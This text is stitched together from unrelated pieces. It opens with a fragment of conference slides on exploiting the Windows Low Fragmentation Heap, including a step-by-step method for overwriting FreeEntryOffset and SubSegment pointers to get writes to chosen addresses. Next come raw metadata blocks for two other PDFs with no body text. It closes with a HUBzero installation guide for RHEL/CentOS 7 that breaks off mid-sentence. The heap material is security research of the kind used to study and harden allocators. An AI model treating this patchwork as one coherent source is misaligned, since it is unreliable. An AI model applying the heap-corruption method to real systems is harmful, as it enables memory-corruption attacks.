<thead> <tr> <th>Memory Pages</th> </tr> </thead> <tbody> <tr> <td>UserBlock @ 0x5157800 for Size 0x30</td> </tr> <tr> <td>+0x0E NextOffset = 0x0014 +0x14 NextOffset = 0x001A</td> </tr> <tr> <td>...</td> </tr> <tr> <td></td> </tr> <tr> <td>FreeEntryOffset = 0x1501</td> </tr> </tbody> </table> <table> <thead> <tr> <th>Memory Pages</th> </tr> </thead> <tbody> <tr> <td>UserBlock @ 0x5162000 for Size 0x40</td> </tr> <tr> <td>+0x02 NextOffset = 0x000A +0x0A NextOffset = 0x0012 +0x12 NextOffset = 0x001A +0x1A NextOffset = 0x0022</td> </tr> <tr> <td>...</td> </tr> <tr> <td></td> </tr> <tr> <td>FreeEntryOffset = 0x0002</td> </tr> </tbody> </table> Prerequisites - Enabled the LFH - Normalize the heap - Control allocations for SIZE - 0x9 – 0xA byte overflow into an adjacent chunk - Adjacent chunk must be FREE - Object to overwrite within the range (0xFFFF * 0x8 = max) Methodology 1. Enable LFH 2. Normalize LFH 3. Alloc1 4. Overwrite into free chunk from Alloc1 5. Alloc2 (contains overwritten header) 6. Alloc3 (Uses overwritten FreeEntryOffset) 7. Write data to Alloc3 (which will be object of your choosing w/in 0xFFFF * 0x8) NextChunk = UserBlock + Depth_IntoUserBlock + (FreeEntryOffset * 8) NextChunk = 0x5157800 + 0x0E + (0x1501 * 8) NextChunk = 0x5162016 Tactics : Exploitation : Observation “Strawberry Pudding? Psst, this is a five course meal.” If the SubSegment can not be used, it will create a new **UserBlock** and assign it to a new **SubSegment**. **RtlpLowFragHeapAllocateFromZone** will create space for new SubSegments if they have all been exhausted. This provides a memory layout where the UserBlock data resides before the _LFH_BLOCK_ZONE structures (which hold pointers for SubSegment initialization). Tactics : Exploitation : SubSegment Overwrite: Part III An overflow past the end of the UserBlock will result in the overwriting of SubSegment information. The item of most concern is the pointer to the UserBlocks structure inside the SubSegment. If this value can be overwritten, then a subsequent allocation will result in a write-n to a user-supplied address. Tactics : Exploitation : SubSegment Overwrite: Part IV ```c if(!Depth || !UserBlocks || SubSeg->LocalInfo != HeapLocalSegmentInfo) { break; } ``` **Issues** 1. The **UserBlock** that can be overflowed MUST reside before the space allocated for the _HEAP_SUBSEGMENT. This is not trivial, due to most applications not having a deterministic **BlockZone->Limit**. You won’t know how many pointers are left. 2. **SubSeg->LocalInfo != HeapLocalSegmentInfo**. The address of the _HEAP_LOCAL_SEGMENT_INFO structure for a specific Bucket is required. The easiest way to determine this value would be a leak of the _LFH_HEAP pointer. (There are probably other ways as well) 3. A guard page could mitigate the effects of an overflow into an adjacent SubSegment. Conclusion “I know that most of the audience will be fast asleep by now.” Conclusion • Data structures have become far more complex • Dedicated FreeLists / Lookaside List are dead • Replaced with new FreeList structure and LFH • Many security mechanisms added since Win XP SP2 • Meta data corruption now leveraged to overwrite application data • Heap normalization more important than ever • Much more work to be done… What’s next? • Developing reliable exploits specifically for Win7 • Abusing Un-encoded header information • Look at Virtual / Debug allocation/free routines • Caching mechanisms • Continuing to come up with heap manipulation techniques • Figuring out information leaks (heap addresses) • HeapCON? Thanks to all the BISTICATI for their help! - Jon Larimer - Ryan Smith - Nico Waisman - Ben Hawkes - Matt Miller - Alex Sotirov - Dino Dai Zovi - Mark Dowd - John McDonald - @jmpesp - Matthieu Suiche Demo “Fin.”
{"Source-Url": "http://illmatics.com/Understanding_the_LFH_Slides.pdf", "len_cl100k_base": 14003, "olmocr-version": "0.1.50", "pdf-total-pages": 80, "total-fallback-pages": 0, "total-input-tokens": 138853, "total-output-tokens": 17062, "length": "2e13", "weborganizer": {"__label__adult": 0.00029087066650390625, "__label__art_design": 0.0003840923309326172, "__label__crime_law": 0.0002135038375854492, "__label__education_jobs": 0.0003528594970703125, "__label__entertainment": 6.645917892456055e-05, "__label__fashion_beauty": 0.00010401010513305664, "__label__finance_business": 0.00011038780212402344, "__label__food_dining": 0.00020420551300048828, "__label__games": 0.0007724761962890625, "__label__hardware": 0.0016269683837890625, "__label__health": 0.00018787384033203125, "__label__history": 0.00019478797912597656, "__label__home_hobbies": 0.00010836124420166016, "__label__industrial": 0.0002827644348144531, "__label__literature": 0.0001723766326904297, "__label__politics": 0.00012564659118652344, "__label__religion": 0.000354766845703125, "__label__science_tech": 0.01548004150390625, "__label__social_life": 6.777048110961914e-05, "__label__software": 0.012908935546875, "__label__software_dev": 0.96533203125, "__label__sports_fitness": 0.00021195411682128904, "__label__transportation": 0.0002334117889404297, "__label__travel": 0.00014865398406982422}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 46705, 0.03202]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 46705, 0.71076]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 46705, 0.65188]], "google_gemma-3-12b-it_contains_pii": [[0, 146, false], [146, 180, null], [180, 486, null], [486, 961, null], [961, 1678, null], [1678, 1744, null], [1744, 3232, null], [3232, 5147, null], [5147, 5463, null], [5463, 6206, null], [6206, 6756, null], [6756, 7712, null], [7712, 8671, null], [8671, 9169, null], [9169, 9983, null], [9983, 10444, null], [10444, 10444, null], [10444, 10492, null], [10492, 10659, null], [10659, 11419, null], [11419, 11419, null], [11419, 11466, null], [11466, 11549, null], [11549, 12433, null], [12433, 13443, null], [13443, 13496, null], [13496, 14252, null], [14252, 15553, null], [15553, 16912, null], [16912, 18126, null], [18126, 18202, null], [18202, 19874, null], [19874, 21525, null], [21525, 22938, null], [22938, 23256, null], [23256, 23912, null], [23912, 23948, null], [23948, 24452, null], [24452, 24527, null], [24527, 25425, null], [25425, 25462, null], [25462, 26373, null], [26373, 27103, null], [27103, 28616, null], [28616, 29770, null], [29770, 29830, null], [29830, 30681, null], [30681, 31984, null], [31984, 32262, null], [32262, 32804, null], [32804, 33228, null], [33228, 33311, null], [33311, 34258, null], [34258, 35097, null], [35097, 35855, null], [35855, 36968, null], [36968, 37029, null], [37029, 37445, null], [37445, 37646, null], [37646, 38871, null], [38871, 39992, null], [39992, 40058, null], [40058, 40779, null], [40779, 41156, null], [41156, 41849, null], [41849, 42271, null], [42271, 42512, null], [42512, 42697, null], [42697, 43554, null], [43554, 44176, null], [44176, 44270, null], [44270, 44487, null], [44487, 44641, null], [44641, 45005, null], [45005, 45766, null], [45766, 45841, null], [45841, 46194, null], [46194, 46492, null], [46492, 46693, null], [46693, 46705, null]], "google_gemma-3-12b-it_is_public_document": [[0, 146, true], [146, 180, null], [180, 486, null], [486, 961, null], [961, 1678, null], [1678, 1744, null], [1744, 3232, null], [3232, 5147, null], [5147, 5463, null], [5463, 6206, null], [6206, 6756, null], [6756, 7712, null], [7712, 8671, null], [8671, 9169, null], [9169, 9983, null], [9983, 10444, null], [10444, 10444, null], [10444, 10492, null], [10492, 10659, null], [10659, 11419, null], [11419, 11419, null], [11419, 11466, null], [11466, 11549, null], [11549, 12433, null], [12433, 13443, null], [13443, 13496, null], [13496, 14252, null], [14252, 15553, null], [15553, 16912, null], [16912, 18126, null], [18126, 18202, null], [18202, 19874, null], [19874, 21525, null], [21525, 22938, null], [22938, 23256, null], [23256, 23912, null], [23912, 23948, null], [23948, 24452, null], [24452, 24527, null], [24527, 25425, null], [25425, 25462, null], [25462, 26373, null], [26373, 27103, null], [27103, 28616, null], [28616, 29770, null], [29770, 29830, null], [29830, 30681, null], [30681, 31984, null], [31984, 32262, null], [32262, 32804, null], [32804, 33228, null], [33228, 33311, null], [33311, 34258, null], [34258, 35097, null], [35097, 35855, null], [35855, 36968, null], [36968, 37029, null], [37029, 37445, null], [37445, 37646, null], [37646, 38871, null], [38871, 39992, null], [39992, 40058, null], [40058, 40779, null], [40779, 41156, null], [41156, 41849, null], [41849, 42271, null], [42271, 42512, null], [42512, 42697, null], [42697, 43554, null], [43554, 44176, null], [44176, 44270, null], [44270, 44487, null], [44487, 44641, null], [44641, 45005, null], [45005, 45766, null], [45766, 45841, null], [45841, 46194, null], [46194, 46492, null], [46492, 46693, null], [46693, 46705, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 46705, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 46705, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 46705, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 46705, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 46705, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 46705, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 46705, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 46705, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 46705, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 46705, null]], "pdf_page_numbers": [[0, 146, 1], [146, 180, 2], [180, 486, 3], [486, 961, 4], [961, 1678, 5], [1678, 1744, 6], [1744, 3232, 7], [3232, 5147, 8], [5147, 5463, 9], [5463, 6206, 10], [6206, 6756, 11], [6756, 7712, 12], [7712, 8671, 13], [8671, 9169, 14], [9169, 9983, 15], [9983, 10444, 16], [10444, 10444, 17], [10444, 10492, 18], [10492, 10659, 19], [10659, 11419, 20], [11419, 11419, 21], [11419, 11466, 22], [11466, 11549, 23], [11549, 12433, 24], [12433, 13443, 25], [13443, 13496, 26], [13496, 14252, 27], [14252, 15553, 28], [15553, 16912, 29], [16912, 18126, 30], [18126, 18202, 31], [18202, 19874, 32], [19874, 21525, 33], [21525, 22938, 34], [22938, 23256, 35], [23256, 23912, 36], [23912, 23948, 37], [23948, 24452, 38], [24452, 24527, 39], [24527, 25425, 40], [25425, 25462, 41], [25462, 26373, 42], [26373, 27103, 43], [27103, 28616, 44], [28616, 29770, 45], [29770, 29830, 46], [29830, 30681, 47], [30681, 31984, 48], [31984, 32262, 49], [32262, 32804, 50], [32804, 33228, 51], [33228, 33311, 52], [33311, 34258, 53], [34258, 35097, 54], [35097, 35855, 55], [35855, 36968, 56], [36968, 37029, 57], [37029, 37445, 58], [37445, 37646, 59], [37646, 38871, 60], [38871, 39992, 61], [39992, 40058, 62], [40058, 40779, 63], [40779, 41156, 64], [41156, 41849, 65], [41849, 42271, 66], [42271, 42512, 67], [42512, 42697, 68], [42697, 43554, 69], [43554, 44176, 70], [44176, 44270, 71], [44270, 44487, 72], [44487, 44641, 73], [44641, 45005, 74], [45005, 45766, 75], [45766, 45841, 76], [45841, 46194, 77], [46194, 46492, 78], [46492, 46693, 79], [46693, 46705, 80]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 46705, 0.0789]]}
olmocr_science_pdfs
2024-11-27
2024-11-27
59b9ff573bcbd115c47254209e870edb4d801bd8
[REMOVED]
{"Source-Url": "https://www.researchgate.net/profile/Michael_Goodrich3/publication/236589418_Combinatorial_Pair_Testing_Distinguishing_Workers_from_Slackers/links/5429290d0cf238c6ea7d0c8f.pdf", "len_cl100k_base": 8536, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 38084, "total-output-tokens": 10608, "length": "2e13", "weborganizer": {"__label__adult": 0.0004878044128417969, "__label__art_design": 0.000484466552734375, "__label__crime_law": 0.0006771087646484375, "__label__education_jobs": 0.003993988037109375, "__label__entertainment": 0.00011992454528808594, "__label__fashion_beauty": 0.000278472900390625, "__label__finance_business": 0.0004210472106933594, "__label__food_dining": 0.0006456375122070312, "__label__games": 0.0011510848999023438, "__label__hardware": 0.0017747879028320312, "__label__health": 0.0015516281127929688, "__label__history": 0.0004162788391113281, "__label__home_hobbies": 0.00022804737091064453, "__label__industrial": 0.0007495880126953125, "__label__literature": 0.00054931640625, "__label__politics": 0.00042891502380371094, "__label__religion": 0.0006747245788574219, "__label__science_tech": 0.170166015625, "__label__social_life": 0.00021278858184814453, "__label__software": 0.00780487060546875, "__label__software_dev": 0.8056640625, "__label__sports_fitness": 0.00042939186096191406, "__label__transportation": 0.0007901191711425781, "__label__travel": 0.00025272369384765625}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 39722, 0.03995]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 39722, 0.46892]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 39722, 0.90141]], "google_gemma-3-12b-it_contains_pii": [[0, 3456, false], [3456, 7844, null], [7844, 11983, null], [11983, 15195, null], [15195, 19017, null], [19017, 22593, null], [22593, 26735, null], [26735, 29817, null], [29817, 29990, null], [29990, 33528, null], [33528, 36921, null], [36921, 39722, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3456, true], [3456, 7844, null], [7844, 11983, null], [11983, 15195, null], [15195, 19017, null], [19017, 22593, null], [22593, 26735, null], [26735, 29817, null], [29817, 29990, null], [29990, 33528, null], [33528, 36921, null], [36921, 39722, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 39722, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 39722, null]], "pdf_page_numbers": [[0, 3456, 1], [3456, 7844, 2], [7844, 11983, 3], [11983, 15195, 4], [15195, 19017, 5], [19017, 22593, 6], [22593, 26735, 7], [26735, 29817, 8], [29817, 29990, 9], [29990, 33528, 10], [33528, 36921, 11], [36921, 39722, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 39722, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
22af3fbb8aae809941269aa78ef159f4157fcacd
[REMOVED]
{"Source-Url": "http://einarj.at.ifi.uio.no/Papers/din17tableaux.pdf", "len_cl100k_base": 15905, "olmocr-version": "0.1.50", "pdf-total-pages": 21, "total-fallback-pages": 0, "total-input-tokens": 85846, "total-output-tokens": 18791, "length": "2e13", "weborganizer": {"__label__adult": 0.0003218650817871094, "__label__art_design": 0.00033402442932128906, "__label__crime_law": 0.00029587745666503906, "__label__education_jobs": 0.0006527900695800781, "__label__entertainment": 5.728006362915039e-05, "__label__fashion_beauty": 0.00012814998626708984, "__label__finance_business": 0.0002193450927734375, "__label__food_dining": 0.00032639503479003906, "__label__games": 0.0006237030029296875, "__label__hardware": 0.000637054443359375, "__label__health": 0.0003590583801269531, "__label__history": 0.00023603439331054688, "__label__home_hobbies": 8.511543273925781e-05, "__label__industrial": 0.00041747093200683594, "__label__literature": 0.000293731689453125, "__label__politics": 0.00026679039001464844, "__label__religion": 0.0004763603210449219, "__label__science_tech": 0.0157470703125, "__label__social_life": 6.753206253051758e-05, "__label__software": 0.004619598388671875, "__label__software_dev": 0.97265625, "__label__sports_fitness": 0.0002522468566894531, "__label__transportation": 0.0006260871887207031, "__label__travel": 0.00019991397857666016}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 65598, 0.01242]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 65598, 0.45664]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 65598, 0.84817]], "google_gemma-3-12b-it_contains_pii": [[0, 2520, false], [2520, 5811, null], [5811, 8154, null], [8154, 9793, null], [9793, 12865, null], [12865, 16849, null], [16849, 20324, null], [20324, 23967, null], [23967, 27437, null], [27437, 31548, null], [31548, 35498, null], [35498, 36782, null], [36782, 40253, null], [40253, 43868, null], [43868, 46610, null], [46610, 50067, null], [50067, 52336, null], [52336, 55893, null], [55893, 59457, null], [59457, 62289, null], [62289, 65598, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2520, true], [2520, 5811, null], [5811, 8154, null], [8154, 9793, null], [9793, 12865, null], [12865, 16849, null], [16849, 20324, null], [20324, 23967, null], [23967, 27437, null], [27437, 31548, null], [31548, 35498, null], [35498, 36782, null], [36782, 40253, null], [40253, 43868, null], [43868, 46610, null], [46610, 50067, null], [50067, 52336, null], [52336, 55893, null], [55893, 59457, null], [59457, 62289, null], [62289, 65598, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 65598, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 65598, null]], "pdf_page_numbers": [[0, 2520, 1], [2520, 5811, 2], [5811, 8154, 3], [8154, 9793, 4], [9793, 12865, 5], [12865, 16849, 6], [16849, 20324, 7], [20324, 23967, 8], [23967, 27437, 9], [27437, 31548, 10], [31548, 35498, 11], [35498, 36782, 12], [36782, 40253, 13], [40253, 43868, 14], [43868, 46610, 15], [46610, 50067, 16], [50067, 52336, 17], [52336, 55893, 18], [55893, 59457, 19], [59457, 62289, 20], [62289, 65598, 21]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 65598, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
3bfd7a0d0b5171f6b1748754307943825e115b1a
Installation Target Audience This document and the installation and maintenance of a HUBzero system has a target audience of experienced Linux administrators (preferably experienced with RedHat or CentOS distributions). Minimum System Requirements HUBzero (RedHat) installations require one or more dedicated hosts running RedHat or CentOS version 7. A typical starter HUBzero installation might consist of a single physical server with dual 64-bit quad-core CPUs, 24 Gigabytes of RAM and a terabyte of disk. Production systems should try to not limit hardware resources, HUBzero is designed to run on systems with many CPU cores and lots of RAM. If you are looking for a system to run a small site with limited physical or virtual resources this is probably not the system for you. However, for demonstration or development purposes we often create VM images with less than a gigabyte of RAM and 5 gigabytes of disk. While fully functional, these virtual machines would only be suitable for a single user doing development or testing. System Architecture All hardware, filesystem partitions, RAID configurations, backup models, security models, etc. and base configurations of the hosts email server, SSH server, network, etc. are the responsibility of the system administrator managing the host. The Hubzero software expects to be installed on a headless server from a minimal ISO with only one network interface (required by OpenVZ) with an MTU no less than ‘1500’. System accounts must not be created with an id of 1000 or greater - more about that in a forthcoming section. Linux Install Basic Operating System Advanced Linux system administrator skills are required, please read carefully. Selecting all the default configurations during the operating system installation may not always be suitable. The latest version of RedHat Enterprise Linux 7 or CentOS 7 (x86_64 is the only architecture supported) should be downloaded and installed. Do not install a default LAMP environment or other server packages. System reboots are required to complete the installation. Be sure to remove the install disk or otherwise reset your server’s boot media before rebooting. The precise server configuration (such as disk partitioning, networking, etc) is dependent on how the hub is to be used and what hardware is being used, all the possible configuration options are not specifically outlined here. This installation guide outlines a very basic configuration but may not be suitable for larger sites. For larger sites, it is generally expected that the hub will be managed by an experienced Linux administrator who can help setup your site to meet your specific requirements. All hardware, filesystem partitions, RAID configurations, backup models, security models, etc. and base configurations of the hosts email server, SSH server, network, etc. are the responsibility of the system administrator managing the host. The following instructions only instruct how to install Hubzero software. At a minimum a "Basic Server" host, ideally from a 'minimal' ISO image, is required with network access. The Hubzero software expects to be installed on a headless server without a Graphical User Interface. Configure Networking and DNS Configure your host's network as desired. A registered domain name and SSL certificate is required and should be obtained prior to installation. A static IP address is highly recommended as well. By default, the Hubzero middleware uses IP addresses in the 192.168.0.0/16 subnet. Do not use an IP address in this range for your host. Set hostname Throughout this documentation you will see specific instructions for running commands, with part of the text highlighted. The highlighted text should be modified to your local configuration choices. (e.g. replace "example.com" with the fully qualified hostname of your machine). HUBzero expects the `hostname` command to return the fully qualified hostname for the system. This step may be skipped if previously configured. ``` sudo hostname hubdomain.org ``` Make the change permanent: ``` sudo hostnamectl set-hostname hubdomain.org ``` ## Delete local Users HUBzero reserves all user ids from 1000 up for hub accounts. As part of the app middleware every account must map to a corresponding system account. Therefore when starting up a hub it is required to remove all accounts that have user ids 1000 or greater. New RedHat/CentOS installations typically do not setup a non root account during setup, but if you have any accounts added to the system, those accounts can be removed as follows: ``` sudo userdel username sudo rm -fr /home/username ``` If you require additional system accounts, they should use user and group ids in the range of 500-999 (these will not interfere with hub operations). ## Update the initial OS install ``` sudo yum update -y ``` ## Disable SELinux Hubzero does not currently support SELinux. Since the default install of RHEL turns it on, we have to turn it off. sudo sed -i 's/^SELINUX=.*/SELINUX=disabled/g' /etc/selinux/config Reboot the system for this change to take effect sudo reboot **Yum repository setup** Configure the hubzero repository configuration package For RedHat Enterprise Linux 7 ```bash sudo subscription-manager repos --enable rhel-7-server-optional-rpms sudo subscription-manager repos --enable rhel-7-server-extras-rpms sudo subscription-manager repos --enable rhel-server-rhscl-7-rpms sudo rpm -Uvh http://packages.hubzero.org/rpm/julian-el7/hubzero-release-julian-2.2.7-1.el7.noarch.rpm ``` For CentOS 7 ```bash sudo yum install -y epel-release sudo yum install -y centos-release-scl-rh sudo rpm -Uvh http://packages.hubzero.org/rpm/julian-el7/hubzero-release-julian-2.2.7-1.el7.noarch.rpm ``` Firewall Install ``` sudo yum remove -y firewalld sudo yum install -y hubzero-iptables-basic sudo service hubzero-iptables-basic start sudo chkconfig hubzero-iptables-basic on If installing the Hubzero tool infrastructure: sudo yum install -y hubzero-mw2-iptables-basic sudo service hubzero-mw2-iptables-basic start sudo chkconfig hubzero-mw2-iptables-basic on ``` HUBzero requires the use of iptables to route network connections between application sessions and the external network. The scripts controlling this can also be used to manage basic firewall operations for the site. The basic scripts installed here block all access to the host except for those ports required by HUBzero (http,https,http-alt,ldap,ssh.smtp,mysql,submit,etc). Web Server Install Apache Httpd Web Server ```bash sudo yum install -y hubzero-apache2 sudo service httpd start sudo chkconfig httpd on ``` PHP Install HUBzero still requires the use of PHP 5.6 (7.x support coming soon). For CentOS/RedHat 7 you used to be able to get 5.6 via the software collections library and when that was removed we mirrored a copy. These packages are no longer being maintained so are not recommended. The current recommendation for RedHat/CentOS 7 is to use the php56 packages from the Remi Repository ([https://rpms.remirepo.net](https://rpms.remirepo.net)). These packages are still receiving security updates for serious issues despite PHP 5.6 reaching upstream EOL. ``` sudo rpm -Uvh https://rpms.remirepo.net/enterprise/remi-release-7.rpm sudo yum install -y hubzero-php56-remi sudo service php56-php-fpm start sudo chkconfig php56-php-fpm on ``` Database MySQL Database Installation HUBzero should work with any MySQL 5.5 compatible database. We have used MySQL 5.5.x, 5.6.x, MariaDB 5.5.x, 10.1.x, 10.3.x, Percona XtraDB Cluster 5.7.x. For CentOS 7 and Redhat Enterprise 7 we recommend MariaDB 5.5.x directly from the MariaDB rpm repositories as they are maintaining longer term support. (https://downloads.mariadb.org/mariadb/repositories). CentOS 7 - MariaDB Database Installation cat << EOF > /etc/yum.repos.d/mariadb-5.5.repo # MariaDB 5.5 CentOS repository list # http://downloads.mariadb.org/mariadb/repositories/ [mariadb] name = MariaDB baseurl = http://yum.mariadb.org/5.5/centos7-amd64 gpgkey=https://yum.mariadb.org/RPM-GPG-KEY-MariaDB gpgcheck=1 EOF sudo yum install -y MariaDB-server sudo service mysql start sudo chkconfig mysql on RedHat Enterprise Linux 7 - MariaDB Database Installation sudo cat << EOF > /etc/yum.repos.d/mariadb-5.5.repo # MariaDB 5.5 RedHat repository list # http://downloads.mariadb.org/mariadb/repositories/ [mariadb] name = MariaDB baseurl = http://yum.mariadb.org/5.5/rhel7-amd64 gpgkey=https://yum.mariadb.org/RPM-GPG-KEY-MariaDB gpgcheck=1 EOF sudo yum install -y MariaDB-server sudo service mysql start sudo chkconfig mysql on Configure Default configuration works well for starters. But for optimal performance you will need a database administrator capable of tuning your database to your hardware configuration and site usage. Mail Install Postfix ```bash sudo yum install -y postfix sudo service postfix start sudo chkconfig postfix on ``` Test ```bash sudo postfix check ``` If the 'postfix check' command returns anything, resolve the reported issues with the Postfix installation before continuing. Configure Postfix Configure Postfix as desired. The default installation may only handle mail on the localhost. HUBzero expects to be able to send mail to registered user's email address to confirm registration and also to send group and support ticket related messages. Incoming mail is also expected to work (see Mailgateway section) in order to receive support ticket updates and email replies to group forum messages. Setting up an appropriate mail configuration is up to the site administrator. The Mailgateway service expects postfix to be the Mail Transfer Agent on CentOS and RedHat systems. CMS Installation ``` sudo yum install -y hubzero-cms-2.2 sudo yum install -y hubzero-texvc sudo yum install -y hubzero-textifier sudo yum install -y wkhtmltopdf ``` Configuration ``` sudo hzcms install hubname ``` It is necessary to immediately run the updater to apply fixes that have not been incorporated into the initial installation. ``` sudo hzcms update ``` SSL Configuration The default SSL certificate is a self signed certificate (aka snakeoil) meant for evaluation purposes only. Some browsers will not accept this certificate and will not allow access to the site without special configuration (https://support.mozilla.org/en-US/questions/1012036). For a production hub you will need to obtain a valid SSL certificate. A certificate may contain two or three pieces: a public certificate, a private key, and sometimes an intermediate certificate. All files are expected to be in PEM format. Let's Encrypt and Certbot may be a viable option to obtain SSL certificates - https://certbot.eff.org/lets-encrypt/centosrhel7-apache.html **Do NOT use Snap. "yum install -y certbot python-certbot-apache", then follow the rest of the instructions to run the 'certbot' commands - start with step #7 'just get a certificate' "certbot certonly --apache". Once you obtain the certificate, copy the SSL certificate files to the httpd SSL configuration directories and restart httpd. sudo cp [your certificate pem file] /etc/httpd/conf/ssl.crt/hubname-cert.pem sudo cp [your certificate private key pem file] /etc/httpd/conf/ssl.key/hubname-privkey.pem sudo cp [your certificate intermediate certificate chain pem file] /etc/httpd/conf/ssl.crt/hubname-chain.pem sudo chown root:root /etc/httpd/conf/ssl.crt/hubname-cert.pem sudo chown root:root /etc/httpd/conf/ssl.key/hubname-privkey.pem sudo chown root:root /etc/httpd/conf/ssl.crt/hubname-chain.pem sudo chmod 0640 /etc/httpd/conf/ssl.crt/hubname-cert.pem sudo chmod 0640 /etc/httpd/conf/ssl.key/hubname-privkey.pem sudo chmod 0640 /etc/httpd/conf/ssl.crt/hubname-chain.pem sudo hzcms reconfigure hubname sudo service httpd restart If you are using the HTML5 VNC Proxy Server, you must update your certificate settings there as well. First Hub Account Creation You should now be able to create a new user account for yourself via hub web registration at "/register". Depending on your email hosting you may not receive the confirmation email. After your new user account is created, you can confirm, approve, and promote the new account as the installing admin by logging into /administrator with the admin account credentials. The 'admin' user password is stored in /etc/hubzero.secrets and can only be read by root user. The admin account is only to be used once to approve and promote your individual user account and should be disabled in the CMS afterwards. SOLR Search Install ``` sudo yum install -y hubzero-solr ``` Mailgateway Install the Hubzero Mailgateway ```bash sudo yum install -y hubzero-mailgateway ``` Configure the Hubzero Mailgateway ```bash sudo hzcms configure mailgateway --enable ``` Submit Introduction The submit command provides a means for HUB end users to execute applications on remote resources. The end user is not required to have knowledge of remote job submission mechanics. Jobs can be submitted to traditional queued batch systems including PBS and Condor or executed directly on remote resources. Installation ```bash sudo yum install -y hubzero-submit-pegasus sudo yum install -y hubzero-submit-condor sudo yum install -y hubzero-submit-common sudo yum install -y hubzero-submit-server sudo yum install -y hubzero-submit-distributor sudo yum install -y hubzero-submit-monitors sudo hzcms configure submit-server --enable sudo service submit-server start sudo chkconfig submit-server on ``` At completion of the yum install commands several files will be located in the directory `/opt/submit`. Excluding python files, the directory listing should like the following: ``` $ ls -a "[A-Z]*.py" -I "[A-Z]*.pyc" -I "." -I "." ... .ssh distributor.sh monitorJob.py monitorTunnelA.py server.py BatchMonitors environmentWhitelist.dat monitorJobDB monitorTunnelD.py sites.dat Scripts environmentWhitelist.dft monitorJobQ.py monitorTunnelI.py sites.dft bin etc monitorJobR.py monitorTunnelR.py tools.dat config managers.dat monitorJobS.py monitorTunnelT.py tools.dft distributor managers.dft monitorJobT.py monitors.dat tunnels.dat distributor.py monitorJob.dump monitorTunnel.py monitors.dft tunnels.dft ``` Configuration Submit provides a mechanism to execute jobs on machines outside the HUB domain. To accomplish this feat, some configuration is required on the HUB and some additional software must be installed and configured on hosts in remote domains. Before attempting to configure submit it is necessary to obtain access to the target remote domain(s). The premise is that a single account on the remote domain will serve as an execution launch point for all HUB end users. It is further assumes that access to this account can be made by direct ssh login or using an ssh tunnel (port forwarding). Having attained account access to one or more remote domains, it is possible to proceed with submit configuration. To get started, the ssh public generated by the installation should be transferred to the remote domain host(s). **HUB Configuration** The behavior of submit is controlled through a set 